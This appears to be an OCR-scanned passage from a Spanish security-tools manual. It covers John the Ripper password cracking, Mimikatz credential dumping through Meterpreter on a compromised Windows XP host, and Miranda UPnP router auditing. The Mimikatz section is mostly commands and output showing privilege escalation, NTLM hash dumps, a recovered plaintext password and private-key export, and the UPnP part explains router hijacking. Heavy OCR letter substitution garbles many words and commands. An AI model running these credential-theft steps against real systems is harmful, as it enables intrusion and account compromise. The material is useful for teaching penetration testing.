Habilitar las reglas de manipulación de palabras para los modos 
de lista de palabras 

—incremental[=MODE] 

Modo incremental 

—markov[=OPTIONS] 

Modo Markov 

—extemal=MODE 

Modo externo o filtro de palabras 

-stdout[=EENGTH] 

Acabar de emitir las contraseñas candidatas 

—restore [=N AME] 

Restaurar una sesión interrumpida 

—session=NAME 

Dar nombre a una sesión 

—status [=N AME] 

Estado de impresión de una sesión 

—make-charset=EILE 

Hacer un archivo de juego de caracteres. 

—show[=EEET] 

Mostrar las contraseñas descifradas 

-test[=TIME] 

Ejecutar pruebas y puntos de referencia para TIME segundos 
cada uno 

—users= [-]EOGIN UID [,.. ] 

Cargar solo estos usuarios 

-groups=[-]GID[,..] 

Cargar solo los usuarios de estos grupos 

—shells=[-] SHEEE [,.. ] 

Cargar solo los usuarios con o sin estos shell 

-salts=[-]COUNT[;MAX] 

Cargar salts cono sin hashes COUNT a MAX 

—pot=NAME 

Archivo pot a usar 

—format=NAME 

Forzar hash tipo ÑAME 

-list=WHAT 

Eista de capacidades 

—save-memory=EEVEE 

Habilitar el ahorro de memoria, a EEVEE 1..3 

—mem-file-size=SIZE 

Umbral de tamaño para la precarga de la lista de palabras. Por 
defecto 5 MB 

—nolog 

Deshabilitar la creación y escritura en el archivo john.log 

-crack-status 

Emitir una linea de estado cada vez que se descifra una 
contraseña 

—max-run-time=N 

Salir después de tantos segundos 




—regen-lost-salts=N 

Regenerar los salts perdidos 

—plugin=NAME [,.. ] 

Cargar estos plugins dinámicos 


Lista de codificaciones 

ASCII o RAW, UTF-8, ISO-8859-I o LatinI o ANSI, ISO-8859-2, ISO-8859-7, ISO-8859-I5, 
K0I8-R, CP437, CP720, CP737, CP850, CP858, CP866, CP868, CPI250, CPI25I, CPI252, 
CPI253, CPI254, CPI255, CPI256 

mailer - Correos electrónicos a los usuarios que han tenido sus contraseñas crackeadas 
Uso: mailer PASSWORD-FILE 

unafs - Script para advertir a los usuarios sobre sus contraseñas débiles 
Uso: unafs DATABASE-FILE CEEE-NAME 

unshadow - Combina contraseñas y ficheros shadow 
Uso: unshadow PASSWORD-EIEE SHADOW-EIEE 

unique - Elimina duplicados de una lista de palabras 

Uso: unique [-v] [-inp=fname] [-cut=len] [-mem=num] OUTPUT-FIEE [-ex_file=ENAME2] 
[-ex_file_only=ENAME2] 


-ex file only=XX 

Asumir que el archivo es 'único', y solo se compara con XX 

-cut=len 

Recortará cada linea de entrada a 'len' bytes de largo, antes de ejecutar el 
algoritmo único. El recorte se realiza en cualquier archivo -ex file 

-mem=num 

Un número que anula el valor UNIQUE HASH EOG desde params.h. El 
valor predeterminado es 21. Se puede aumentar hasta 25. 

-V 

Es para el modo detallado y muestra los recuentos de lineas durante la 
ejecución 


Ejemplo 1 

Probar John the Ripper 
John —test 

Ejemplo 2 

john —wordbst=/usr/share/john/password.lst —rules unshadowed.txt 
Ejemplo 3 

Descifrar contraseñas de usuarios de Einux por fuerza bruta 

Una vez instalada la herramienta y realizado el test de rendimiento ya podemos empezar con un 
caso real. Podemos ir directamente el archivo “/etc/shadow” que contiene las contraseñas de Einux 
y descifrarlas, sin embargo, en este ejemplo vamos a crear un documento manualmente con un 
usuario y una contraseña y le indicaremos a John que lo descifre. Vamos a hacer esto por tres 
razones: 

• Para no comprometer realmente nuestro sistema. 

• Para obtener los resultados lo más rápidamente posible (vamos a utilizar una clave muy 
simple) 

• Para tener una primera toma de contacto con la herramienta y familiarizarnos con ella. 

Para ello creamos un nuevo archivo de texto, por ejemplo, en nuestra carpeta personal de Ubuntu 
con el siguiente contenido: user:AZl.zWwxIhl5Q 





A continuación vamos a indicar a John que empiece a trabajar para descifrar la contraseña del 
arehivo anterior. Para ello teeleamos: 

John password.txt 

La herramienta empezará a trabajar. Debemos esperar a que John the Ripper eonsiga deseifrar la 
contraseña del anterior arehivo. Este proeeso puede tardar horas e ineluso dias según la dfieultad de 
la misma. 

Cuando aeaba, para verla simplemente debemos utilizar el eomando -show de la siguiente manera: 
john —show password.txt 
La eontraseña era “example” 

Ejemplo 4 

Deseifrar eontraseñas de usuarios de Linux utilizando un dieeionario de elaves 

En este easo vamos a partir de una elave de ejemplo que hemos guardado en un doeumento 

llamado “password.txt”: 

user:AZl.zWwxIhl5Q 

A continuación lo que tenemos que hacer es tener o crear un diccionario de claves personalizado. 
Podemos descargar estos diccionarios de Internet, pero para hacer las primeras pruebas del 
programa vamos a crear nosotros un diccionario sencillo, al que llamaremos “passwords.lst” y en el 
que introduciremos varios valores, cada uno en una línea, pero siendo uno de ellos la palabra 
“example”, ya que corresponde con nuestra contraseña. 

A continuación simplemente debemos ejecutar John the Ripper con el parámetro -wordlist= 
seguido de la ruta de nuestro archivo, 
john —wordlist=passwords.lst password.txt 

Al tener una clave sencilla y pocas entradas del diccionario el proceso será prácticamente 
instantáneo. Ya hemos descifrado la contraseña y utilizar el parámetro -show para que nos muestre 
el resultado. 

john —show password.txt 



81. Mimikatz 


Mimikatz es una gran herramienta de post-explotación escrita por Benjamin Delpy. Después de la 
fase inicial de explotación, los atacantes pueden querer obtener un punto de apoyo en la red de 
computadoras. Hacerlo a menudo requiere un conjunto de herramientas complementarias. Mim ik atz 
es un intento de agrupar algunas de las tareas más útiles que los atacantes querrán realizar. 

Afortunadamente, Metasploit ha decidido incluir Mimikatz como un script de meterpreter para 
permitir un fácil acceso a su conjunto completo de funciones sin necesidad de cargar ningún archivo 
en el disco del dispositivo comprometido. 

Cargando Mimikatz 

Después de obtener un shell de meterpreter, debemos asegurarnos de que nuestra sesión se ejecute 
con privilegios de nivel de sistema para que Mimikatz funcione correctamente. Para ello se 
ejecutarán los comandos getuid y getsystem 

meterpreter > getuid 

Server usemame: WINXP-E95CE571Al\Administrator 
meterpreter > getsystem 
...got System (via technique 1). 
meterpreter > getuid 

Server usemame: NT AUTHORITY\SYSTEM 

Mimikatz admite arquitecturas de Windows de 32 bits y 64 bits. Después de actualizar los 
privilegios a SYSTEM, se necesita verificar con el comando sysinfo, cual es la arquitectura de la 
máquina comprometida. Esto será relevante en máquinas de 64 bits, ya que podemos tener 
comprometido un proceso de 32 bits en una arquitectura de 64 bits. Si este es el caso, meterpreter 
intentará cargar una versión de 32 bits de Mimikatz en la memoria, lo que hará que la mayoría de 
las funciones no fúncionen. Esto se puede evitar mirando la lista de procesos en ejecución y 
migrando a un proceso de 64 bits antes de cargar Mimikatz. 

meterpreter > sysinfo 

Computer : WINXP-E95CE571A1 

OS : Windows XP (Build 2600, Service Pack 3). 

Architecture : x86 
System Eanguage : en_US 
Meterpreter 
: x86/win32 

En este caso, dado que es una máquina de 32bit, se puede proceder a cargar el módulo mimikatz en 

la memoria y con el comando help mimikatz nos dice los comandos disponibles. 

meterpreter > load mim ik atz 

Eoading extensión mimikatz...success. 

meterpreter > help mim ik atz 


kerberos 

Intento de recuperar credenciales kerberos. 

livessp 

Intento de recuperar credenciales livessp 

mimikatz command 

Ejecutar un comando personalizado 

msv 

Intento de recuperar credenciales msv (hashes) 




ssp 

Intento de recuperar eredeneiales ssp 

tspkg 

Intento de reeuperar eredeneiales tspkg 

wdigest 

Intento de reeuperar eredeneiales wdigest 


Metasploit proporciona algunos comandos integrados que muestran la mayoría de las caraeteristieas 
de uso eomún del Mimikatz, el volcado de hashes y las eredenciales de texto elaro directamente 
desde la memoria. Sin embargo la opeión mimikatz eommand nos da aeeeso eompleto a todas las 
funeiones. 

meterpreter > mimikatz eommand -f versión 
mimikatz 1.0 x86 (RC) (Nov 7 2013 08:21:02) 

Los modules disponibles son : 



Standard 

erypto 

Criptografía y eertifíeados 

hash 

Hash 

System 

Gestión del sistema 

proeess 

Manipulaeión de proeesos 

thread 

Manipulación de threads 

serviee 

Manipulación de servicios 

privilege 

Manipulación de privilegios 

handle 

Manipulación de handles 

impersonate 

Manipulaeión de tokens de aeeeso 

winmine 

Manipulaeión de démineur 

minesweeper 

Manipulaeión de démineur 7 

nogpo 

Anti-gpo et patchs divers 

samdump 

Voleado de SAM 

injeet 

Inyeetor de librerías 

ts 

Servidor de terminal 

divers 

Funeiones diversas 

sekurlsa 

Voleado de sesiones eorrientes para los 
proveedores LSASS 

efs 

Manipulaeión EFS 


Para eonsultar las opeiones disponibles de eada uno de estos módulos, podemos usar la siguiente 
sintaxis. 

meterpreter > mimikatz eommand -f divers:: 

Module : 'divers' identifié, mais commande " introuvable 

Deseription du module : Fonetions diverses n'ayant pas encore assez de eorps pour avo 
noroutemon - [experimental] Pateh Juniper Network Conneet pour ne plus supervise 
eventdrop - [super experimental] Pateh l'observateur d'événements pour ne plus 





cancelator - Patch le bouton annuler de Windows XP et 2003 en eonsole pour déver 
seerets 

- Afidche les seerets utilisateur 


Lectura de hashes y contraseñas de la memoria 

Se pueden usar tanto los eomandos Metasploit ineorporados como los comandos del Mimikatz 
nativo para extraer los hashes y las credenciales de texto sin cifrar de la máquina comprometida. 

Con el metasploit incorporado: 
meterpreter > msv 
[+] Running as SYSTEM 
[*] Retrieving msv credentials 
msv credentials 


AuthlD Package Domain User Password 


0;78980 NTLM WINXP-E95CE571A1 0;996 Negotiate 0;997 Negotiate 0;56683 NTLM 0;999 

NTEM Administrator lm{ 0000000000000000000000000 

NT AUTHORITY NETWORK SERVICE lm{ aad3b435b51404eeaad3b435b5 

NT AUTHORITY EOCAL SERVICE n.s. (Credentials KO) 

n.s. (Credentials KO) 

WORKGROUP 

WINXP-E95CE571A1$ 

n.s. (Credentials KO) 

meterpreter > kerberos 

[+] Running as SYSTEM 

[*] Retrieving kerberos credentials 

kerberos credentials 


AuthlD Package Domain User Password 


0;999 NTLM WORKGROUP WINXP-E95CE571A1$ 0;997 Negotiate NT AUTHORITY LOCAL 

SERVICE 0;56683 NTLM 0;996 Negotiate NT AUTHORITY NETWORK SERVICE 0;78980 

NTLM WINXP-E95CE571A1 

Administrator 

SuperSecretPassword 

Con el mimikatz nativo: 

meterpreter > mimikatz command -f samdump::hashes 
Ordinateur: winxp-e95ce571al 
BootKey : 553d8cl349162121e2a5d3d0f571db7f 
Rid: 500 

User: Administrator 
LM: 

NTLM : d6eec67681a3belllb5605849505628f 
Rid: 501 
User: Guest 
LM: 

NTLM : 

Rid: 1000 

User: HelpAssistant 

LM: 6165cdl aOebcó 1 e470475c82cd451 e 14 









NTLM : 

Rid : 1002 

User: SUPPORT_388945aO 
LM : 

NTLM : 771eelfce7225b28f8aec4a88aea9b6a 

meterpreter > mimikatz command -f sekurlsa::searchPasswords 

[0] { Administrator ; WINXP-E95CE571A1 ; SuperSecretPassword } 

Otros módulos 

Eos otros módulos de mimikatz contienen muchas características útiles. Una lista de características 
más completa se puede encontrar en el blog de Benjamín Delpy: http://blog.gentilkiwi.com/. Abajo 
hay varios ejemplos de uso para comprender la sintaxis empleada. 

El módulo handle se puede usar para enumerar/eliminar procesos y suplantar tokens de usuario. 

meterpreter > mimikatz command -f handle:: 

Module : 'handle' identifié, mais commande " introuvable 

Description du module : Manipulation des handles 

list - Affiche les handles du systéme (pour le moment juste les processus 

processStop - Essaye de stopper un ou plusieurs processus en utilisant d'autres h 

tokenlmpersonate - Essaye d'impersonaliser un token en utilisant d'autres hand 

nullAcl - Positionne une ACE nuil sur des Handles 

meterpreter > mimikatz command -f handle::list 

...snip... 

760 lsass.exe -> 1004 Token NT AUTHORITY\NETWORK 

760 lsass.exe -> 1008 Process 704 winlogon.exe 

760 lsass.exe -> 1052 Process 980 svchost.exe 

760 lsass.exe -> 1072 Process 2664 fubar.exe 

760 lsass.exe -> 1084 Token NT AUTHORlTY\EOCAE SE 

760 lsass.exe -> 1096 Process 704 winlogon.exe 

760 lsass.exe -> 1264 Process 1124 svchost.exe 

760 lsass.exe -> 1272 Token NT AUTHORlTY\ANONYMOU 

760 lsass.exe -> 1276 Process 1804 psia.exe 

760 lsass.exe -> 1352 Process 480jusched.exe 

760 lsass.exe -> 1360 Process 2056 TPAutoConnSvc.exe 

760 lsass.exe -> 1424 Token WlNXP-E95CE571Al\Admi 

...snip... 

El módulo Service permite listar cada servicio de Windows y manipularlos, 
meterpreter > mimikatz command -f Service:: 

Module : 'service' identifié, mais commande " introuvable 

Description du module : Manipulation des Services 

list - Eiste les Services et pilotes 

start - Démarre un service ou pilote 

stop - Arréte un service ou pilote 

remove - Supprime un service ou pilote 

mimikatz - Installe et/ou démarre le pilote mimikatz 

meterpreter > mimikatz command -f service::list 

...snip... 

W1N32_SHARE_PR0CESS - STOPPED RemoteRegistry - Remóte Registry 
KERNEE DRIVER - RUNNING RECOMM - Bluetooth Device (RECOMM Protocol TDl) 



WIN32_OWN_PROCESS STOPPED RpcLocator - Remóte Proeedure Cali (RPC) 

980 WIN32_OWN_PROCESS RUNNING RpeSs - Remóte Proeedure Cali (RPC) 

WIN32_OWN_PROCESS STOPPED RSVP QoS RSVP 

760 WIN32_SHARE_PROCESS RUNNING SamSs Seeurity Aeeounts Manager 

WIN32_SHARE_PROCESS STOPPED SCardSvr Smart Card 

1124 WIN32_SHARE_PROCESS RUNNING Sehedule Task Seheduler 

KERNEE DRIVER STOPPED Seedrv 

1124 INTERACTIVE PROCESS WIN32_SHARE_PROCESS RUNNING seelogon Seeon 
1804 WIN32_OWN_PROCESS RUNNING Seeunia PSI Agent Seeunia PSI Agent 
3460 WIN32_OWN_PROCESS RUNNING Seeunia Update Agent Seeunia Update Agent 

...snip... 

El módulo erypto permite enumerar y exportar eualquier eertifieado y sus eorrespondientes 
elaves privadas que pueden almaeenarse en la máquina eomprometida. Esto es posible ineluso 
están mareados eomo no exportables. 

meterpreter > mimikatz eommand -f erypto:: 

Module : 'erypto' identifié, mais eommande " introuvable 
Deseription du module : Cryptographie et eertifieats 
listProviders - Eiste les providers installés 
listStores - Liste les magasins systéme 
listCertifieates - Liste les eertifieats 
listKeys - Liste les eonteneurs de elés 
exportCertifieates - Exporte les eertifieats 
exportKeys - Exporte les elés 

pateheng - [experimental] Pateh le gestionnaire de elés pour l'export de elés 
pateheapi - [experimental] Pateh la CryptoAPI eourante pour l'export de elés no 

meterpreter > mimikatz eommand -f erypto::listProviders 
Providers CryptoAPI: 

Gemplus GemSAEE Card CSP vI.O 

Infineon SICRYPT Base Smart Card CSP 

Mierosoft Base Cryptographie Provider vl.O 

Mierosoft Base DSS and Diífie-Hellman Cryptographie Provider 

Mierosoft Base DSS Cryptographie Provider 

Mierosoft Base Smart Card Crypto Provider 

Mierosoft DH SChannel Cryptographie Provider 

Mierosoft Enhaneed Cryptographie Provider vl.O 

Mierosoft Enhaneed DSS and Diffie-Hellman Cryptographie Provider 

Mierosoft Enhaneed RSA and AES Cryptographie Provider (Prototype) 

Mierosoft RSA SChannel Cryptographie Provider 
Mierosoft Strong Cryptographie Provider 



82. Miranda 


UPnP (Universal Plug-N-Play) es un protocolo que permite que varios dispositivos de red se 
autoconfiguren por si mismos. Uno de los usos más comunes de este protocolo es permitir que 
dispositivos o programas abran puertos en tu enrutador casero con el objetivo de comunicarse 
apropiadamente con el mundo exterior. El Xbox, por ejemplo, lo hace. El protocolo UPnP está 
basado en protocolos y especificaciones pre-existentes, más precisamente en UDP, SSDP, SOAP y 
XME. 

Este articulo tratará sobre algunos problemas de seguridad relacionados con UpnP y describe 
brevemente el funcionamiento interior del protocolo y muestra como identificar y analizar los 
dispositivos UPnP en una red usando herramientas Open Source. En el articulo nos enfocaremos en 
IGDs (Internet Gateway Devices - Dispositivos de pasarela a Internet), por ejemplo emuladores, 
pero es importante recordar que hay muchos otros dispositivos y sistemas que también soportan 
UPnP y pueden ser vulnerables a ataques similares. 

El problema con UPnP 

Permitir que programas legitimos alteren la configuración a medida del enrutador, hace la vida de 
los hackers más fácil. Con el fin de que UPnP sea verdaderamente «plug-n-play», no hay ninguna 
autenticación en este protocolo, es decir, cualquier programa puede usar UPnP para alterar la 
configuración del enrutador o de cualquier otro dispositivo UPnP 

A principios de este año, PDP de GNUCITIZEN publicó una investigación que habia realizado 
sobre la seguridad de UPnP. Si bien los problemas de seguridad de UPnP no son nuevos, es un 
protocolo que normalmente solo funciona dentro de una red local, forzando al atacante a infiltrarse 
en la red antes de explotar cualquier vulnerabilidad de UPnP Sin embargo PDP mostró que era 
posible usar Elash para enviar peticiones UPnP desde dentro del navegador de un cliente a un 
enrutador con UPnP habilitado y cambiar la configuración del cortafuegos. Dado que el fichero 
Elash puede ser embebido dentro de una página maliciosa o inyectada dentro de una página 
confiable via XSS o SQE Injection, un atacante podría usar esto para alterar remotamente la 
configuración del enrutador. Eo que es peor es que en la mayoría de los casos, estos cambios en la 
configuración no son reflejados en la interfaz administrativa del enrutador, dejando a la victima 
completamente sin conocimiento de lo que ha ocurrido. 

Por supuesto, para las redes inalámbricas UPnP es peligroso incluso sin el ataque Elash, tanto que 
un atacante puede mantener distancia física de la red mientras gana acceso a la red interna. Una vez 
dentro, puede empezar a alterar la configuración del enrutador vía UPnP 

¿Qué tan serio es esto? 

Ea seriedad de este ataque depende de la implementación de UPnP usada en el enrutador, como 
también de la configuración del enrutador. Por ejemplo, el ataque de la alteración de la 
configuración vía Elash descrita anteriormente debe de adivinar cual es la dirección IP del 
enrutador. Esto es normalmente fácil de predecir, pero algunos enrutadores también se asignan sus 
propios nombres de dispositivo, lo cual hace que cualquier intento de adivinación de la dirección IP 
no funcione. Sin embargo incluso si un enrutador no se resuelve el nombre del dispositivo, la 
seguridad a través de la oscuridad no es una buena práctica, y simplemente cambiar la dirección IP 
no debe considerarse como suficiente defensa contra un ataque de este tipo. 

Además algunas implementaciones UPnP son mas arriesgadas que otras; varios IGDs con UPnP 
activado permiten que la configuración DNS sea alterada directamente vía UPnP, lo cual sería solo 
el comienzo de un ataque MiTM/Phishing. Particularmente estos dispositivos que usan algún tipo 



de Linux embebido, de heeho usan los valores que reeiben a través de las petieiones UPnP sin 
fdtrarlos, eomo parte de eomandos shell ejeeutados, dejándolos abiertos a ataques de inyeeeión de 
eomandos. 

OK, digamos que ningún nombre de dispositivo está asignado a la direeción IP del emulador y su 
implementaeión UPnP no es vulnerable a DNS-Hijaeking o inyeeeión de eomandos. 
Desafomatudamente todavia no estamos fuera de peligro. Reeordar que el uso más eomún de UPnP 
es abrir puertos en un router. Debido a esto, easi todos los router que soportan UPnP también es 
soportar la aeeión AddPortMapping. Eseneialmente esta aceión permite a algún dispositivo o 
programa deeirle al enrutador «redirige todo el tráfico proveniente del puerto X al host interno Y de 
la WAN el cual está en escucha en el puerto Z». Bueno, ¿Y qué si redirigimos todo el tráfico 
proveniente de la WAN por el puerto 8080 a yahoo.com por el puerto 80? Ya sé, ya 
sé, yahoo.com no es un host interno! Pero algunas configuraciones UPnP no verifican lo que están 
redirigiendo a los dispositivos internos y en consecuencia se permite al atacante reencaminar su 
tráfico por medio del enrutador. Además si el atacante conoce la dirección IP interna del enrutador o 
su nombre, puede ser capaz de redirigir algún puerto del lado WAN del enrutador al puerto 80 del 
lado LAN del enrutador, abriendo efectivamente la interfaz administrativa del enrutador al mundo. 

Una vista general sobre el protocolo UPnP 

EL protocolo UPnP usa la dirección mulicast (multidifusión) 239.255.255.250 y el puerto TCP 
1900. Los dispositivos que ofrecen servicios UPnP enviarán periódicamente mensajes SSDP 
NOTIEIY a 239:255:255:250:1900, anunciándose a cualquier cliente UPnP que esté en escucha. Si 
se observas el tráfico en tu LAN que usa un enrutador con los servicios UPnP activos,se verá que 
éste envia una ráfaga de mensajes SSDP NOTIEY cada pocos segundos. Esto ocurre porque la 
mayoría de los enrutadores se anuncian como múltiples dispositivos UPnP y envían una notificación 
por cada tipo de dispositivo. 

Asimismo los clientes UPnP pueden enviar peticiones SSDP M-SEARCH a 239:255:255:250:1900 
para ver si algún dispositivo UPnP responde. Eos clientes pueden enviar una petición M-SEARCH 
buscando algún dispositivo UPnP o pueden especificar que están buscando algún dispositivo en 
particular o pueden consultar solo por algún dispositivo que soporte un servicio UPnP especifico. 
Eos dispositivos UPnP que concuerden con los dispositivos/servicios pedidos, responderán con un 
mensaje SSDP RESPONSE, el cual contiene la misma información que la enviada en un mensaje 
SSDP NOTIEIY 

Un mensaje SSDP NOTIEY enviado por un dispositivo UPnP contiene una cabecera ‘Eocation’ la 
cual especifica la ubicación de un archivo XME. Este archivo XME contiene los datos que indican 
el tipo de dispositivo y los servicios soportados por el dispositivo, asi como las rutas a otros 
documentos XME adicionales que describen los servicios detalladamente. Para descubrir las 
capacidades UPnP completas de un IGD, se debe analizar todos los archivos XML para extraer los 
tipos de dispositivos, servicios, y acciones ofrecidas por el IGD. 

Eos dispositivos UPnP soportan varios servicios que a su vez anuncian las acciones que soportan. 

Un cliente UPnP puede enviar una petición al dispositivo UPnP en cualquier momento y ésta podria 
ser una petición para abrir un puerto, cambiar el servidor DNS por defecto o cualquier otra que el 
dispositivo soporte. Eos datos enviados/devueltos en cualquier petición o respuesta son enviados 
usando SOAP, el cual usa XME para estructurar la información enviada entre las dos partes. Eas 
peticiones SOAP son esencialmente peticiones HTTP POST con alguna cabecera SOAP adicional 
incluida en las cabeceras HTTP. 


Auditando dispositivos UPnP manualmente 



Para descubrir si algún enrutador soporta UPnP, se debe ir a su interfaz administrativa y verificar si 
hay alguna opción para habilitar/deshabilitar UPnP, mientras que la mayoría de los emuladores 
tienen UPnP habilitado por defecto. 

Para realmente auditar la configuración de algún dispositivo UPnP, se puede usar el programa 
Wireshark y buscar paquetes los SSDP NOTIFIY que están siendo enviados a la dirección multicast 
239.255.255.250 al puerto 1900. Estas notificaciones serán dispositivos UPnP anunciándose a la 
red. Una vez los mensajes SSDP NOTIFIY son capturados, se puede examinar las cabeceras SSDP 
de los datos para obtener la ubicación del archivo XML. Una vez encontrado este fichero haciendo 
simplemente una petición HTTP GET, se puede examinar para ver que dispositivos y servicios 
soporta el dispositivo UPnP. Después se pueden solicitar los archivos XML adicionales al 
disposisitvo, uno por cada servicio y analizar esos archivos XML para determinar que acciones 
soporta cada servicio, y luego correlacionar las posibles variables de estado y las variables de 
entrada/salida usadas para cada acción, asi como identificar que variables son usadas como entrada 
y cuales como salida. Una acción puede usar una variables como parámetro de entrada, mientras 
que otras usan la misma variable como parámetro de salida. 

Obviamente auditar los dispositivos UPnP manualmente puede consumir extremadamente mucho 
tiempo y nos obliga a generar manualmente peticiones a los dispositivos UPnP para lanzar ataques 
contra ellos. Usar una herramienta para automatizar el proceso haria nuestra vida mucho más fácil. 

Una introducción a Miranda 

Miranda es una herramienta de administración de UPnP escrita en Python. Soporta un shell de linea 
de comandos que se autocompleta con la tecla TAB y el historial de comandos, y provee la 
habilidad de guardar el trabajo en un fichero que puede ser recargado para su posterior análisis. 
También se pueden alterar las configuraciones del programa sobre la marcha y registrar todos los 
comandos en un archivo log, de manera que se puede saber exactamente lo que se ejecutó y cuando 
lo ejecutó. 

Algunas de sus características incluyen; 

• Shell interactivo con finalización de pestañas e historial de comandos 

• Descubrimiento pasivo y activo de dispositivos UPNP. 

• Consultas de MSEARCH personalizables 

• Control total sobre la configuración de la aplicación, como direcciones IP, puertos y 
encabezados 

• Enumeración simple de dispositivos UPNP, servicios, acciones y variables. 

• Correlación de variables de estado de entrada/salida con acciones de servicio 

• Posibilidad de enviar acciones a servicios/dispositivos UPNP. 

• Posibilidad de guardar los datos en un archivo para su posterior análisis y colaboración. 

• Comando de registro 

Miranda puede descubrir los dispositivos UPnP tanto activamente como pasivamente y con un 
simple comando pueden ser enumerados todos los tipos de dispositivos, servicios, acciones y 
variables. Las variables de estado del servicio pueden ser automáticamente correlacionadas con sus 
acciones asociadas, e identificadas tanto sus variables de salida y/o entrada para cada acción. 
Miranda almacena la información de todos los dispositivos en una estructura única de datos y 
permite desplegar directamente toda la información y ver su contenido. 

Finalmente se puedes ejecutar cualquier acción soportada por el dispositivo UpnP Si la acción 
requiere algún valor de entrada, informará de su nombre y de su tipo (string, 4 byte entero, 2 byte 
entero, etc), asi como los valores permitidos o rangos de valores y se le pedirá que ingrese el valor. 




utilización 


Cuando se ejecuta miranda, aparece el promtpt upnp> y es aquí donde se emplean los comandos 
Que se explican a continuación. 

Sin embargo la ejecución de miranda puede ir acompañada de las opciones siguientes 


-s <struct file> 

Cargar datos del dispositivo anterior desde el archivo de 
estructura 

-1 <log file> 

Registrar los comandos proporcionados por el usuario al archivo 
de registro 

-i <interface> 

Especificar el nombre de la interfaz a usar 

-u 

Deshabilitar la opción show-uniq-hosts-only 

-d 

Habilitar el modo de depuración 

-V 

Habilitar el modo verbose 

-h 

Muestra la ayuda 


Comando host 

upnp> host <list I get | info | summary | details | send> [host índex #] 
Opciones 


list 

Muestra un índice de todos los dispositivos UPNP conocidos junto con sus 
respectivos números de índice 

get 

Obtiene información detallada del dispositivo especificado 

details 

Obtiene y muestra información detallada del dispositivo especificado 

summary 

Muestra un breve resumen que describe el dispositivo especificado 

info 

Permite enumerar todos los elementos del objeto dispositivo 

send 

Permite enviar solicitudes SOAP a dispositivos y servicios 


Ejemplos: 

> host list 

> host get 0 

> host summary 0 

> host info 0 deviceList 

> host send 0 <device name> <service name> <action name> 


Notas: 

• Todos los comandos de dispositivo EXCEPT para los comandos 'host send', 'host info' y 
'host lisf toman solo un argumento: el número de índice de dispositivo. 

• El número de índice de dispositivo se puede obtener ejecutando 'host lisf, que no requiere 
más argumentos. 

• El comando 'host send' requiere que también se especifique el nombre del dispositivo, el 
nombre del servicio y el nombre de la acción que desea enviar. Esta información se puede 
obtener viendo el listado de "host details" o consultando la información del dispositivo 
mediante el comando "host info". 

• El comando 'host info' permite enumerar selectivamente la estructura de datos de 
información del dispositivo. Se muestran todos los elementos de datos y sus valores 
correspondientes. Un valor de '{}' indica que el elemento es una subestructura que se puede 





enumerar más adelante. 


Comando head 

Uso: head <show I del <header> I set <header> <value» 


show 

Muestra toda la información del encabezado actual 

set 

Permite configurar los encabezados SSDP utilizados al enviar consultas con el 
comando 'msearch' 

del 

Elimina un encabezado actual de la lista 


Ejemplo: 

> head show 

> head set MX 3 

Comando msearch 

Uso: mseareh [device | Service] [<device name> | <service name>] 

Si no se especifican argumentos, 'msearch' busca upnp: rootdevice. Los tipos de dispositivo / 
servicios especificados se pueden buscar utilizando los argumentos 'device' o 'service' 

Ejemplo: 

> msearch 

> msearch service WANIPConnection 

> msearch device InternetGatewayDevice 

Comando seti 

Uso: 

seti <show I uniq | debug | verbose | versión <version #> | iface <mterface> | socket <ip:port> > 
Opciones 


show 

Muestra la configuración actual del programa 

uniq 

Alterna la configuración show-only-uniq-hosts al descubrir 
dispositivos UPNP 

debug 

Establece el modo de depuración 

verbose 

Establece el modo verbose 

versión 

Visualiza la versión 

iface 

Cambia la interfaz de red en uso 

Socket 

Restablece la dirección IP de multidifusión y el número de puerto 
utilizado para el descubrimiento de UPNP 


Ejemplo: 

> seti Socket 239.255.255.250:1900 

> seti uniq 

Comando save 

Uso: save <data | info <host#» [file prefix] 
Opciones 


data 

Guardará los datos sin procesar del dispositivo en un archivo adecuado 
para importar más tarde a través de 'load' 

info 

Guardará los datos del dispositivo especificado en un formato legible 

file prefix 

Guardará los archivos en formato de 'stmct_ [prefix] .mir' e 






información_ [prefix] .mir 


Ejemplo: 

> save data wrt54g 

> save info 0 wrt54g 


Notas: 

• Los archivos de datos se guardan como 'struct_ [prefix] .mir'. 

• Los archivos de información se guardan como 'info_ [prefix] .mir'. 

• Si no se especifica un prefijo, se usará el número de índice del dispositivo para el prefijo. 

• Los datos guardados por el comando 'save info' son los mismos que la salida del comando 
'host details'. 

Descubriendo dispositivos UPnP con Miranda 

Cuando se inicias Miranda por primera vez, abrirá una shell interactiva con un prompt ‘upnp>’ a la 
espera de ejecución de comandos. La primera cosa que probablemente se quiera hacer es descubrir 
si hay algún dispositivo UPnP en la red. Esto puede ser realizado con los comandos ‘pcap’ o 
‘msearch’. Cuando es ejecutado el comando ‘pcap’, Miranda se pondrá en escucha (modo pasivo) 
buscando mensajes SSDPNOTILY, mientras que el comando ‘msearch’ consultará los dispositivos 
UPnP usando un mensaje M-SEARCH. Por defecto, el comando msearch buscará todos los 
dispositivos UPnP, pero también se le puede especificar que busque un determinado tipo de 
dispositivo o servicio si así se desea. En este ejemplo, simplemente buscaremos algún dispositivo: 

upnp> msearch 

Entering discovery mode for 'upnp:rootdevice', Ctl+C to stop... 

SSDP reply message firom 192.168.0.1:5678 
XML file is located at http://192.168.0.l:5678/igd.xml 
Device is running Embedded UPnP/1.0 

Discover mode habed... 

Aquí podemos ver que hay un dispositivo UPnP en la red, el cual resulta ser un enrutador D-Link 
DI-524. También podemos ver que informa del tipo de servidor UPnP (‘Embedded UPnP/1.0’), y la 
ubicación del archivo XML donde hay toda la información detallada. 

Ejecutando el comando ‘host list’ nos muestra la lista de todos los dispositivos UPnP descubiertos y 
el número índice de cada uno, número índice que se usa en los comandos subsecuentes para hacer 
referencia a un dispositivo específico: 

upnp> host list 

[0] 192.168.0.1:5678 

Hemos descubierto un dispositivo UpnP y ahora se necesita enumerar sus capacidades. Ejecutando 
el comando ‘host get 0’ obtendremos toda la información UPnP del host con el índice 0: 

upnp> host get 0 

Requesting device and Service info for 192.168.0.1:5678 (this could take a few seconds)... 

Host data enumeration complete! 




Ahora buscamos en todos los datos que hemos reeogido de este dispositivo usando el eomando 
‘host info’. Este eomando nos permite desplegar los datos del dispositivo espeeifieado y ver la 
informaeión que se almaeena. Observar también que todos estos eomandos se autoeompletaran 
automátieamente, de manera que no se tendrá que eseribirlos por eompleto: 

upnp> host info 0 

xmlFile : http;//192.168.0.1;5678/igd.xml 
ñame : 192.168.0.1:5678 
proto : http:// 

serverType : Embedded HTTP Server 3.23 
upnpServer: Embedded EÍPnP/1.0 
dataComplete : True 
devieeEist: {} 

upnp> host info 0 devieeEist 
IntemetGatewayDeviee : {} 

WANDeviee : {} 

WANConneetionDeviee : {} 

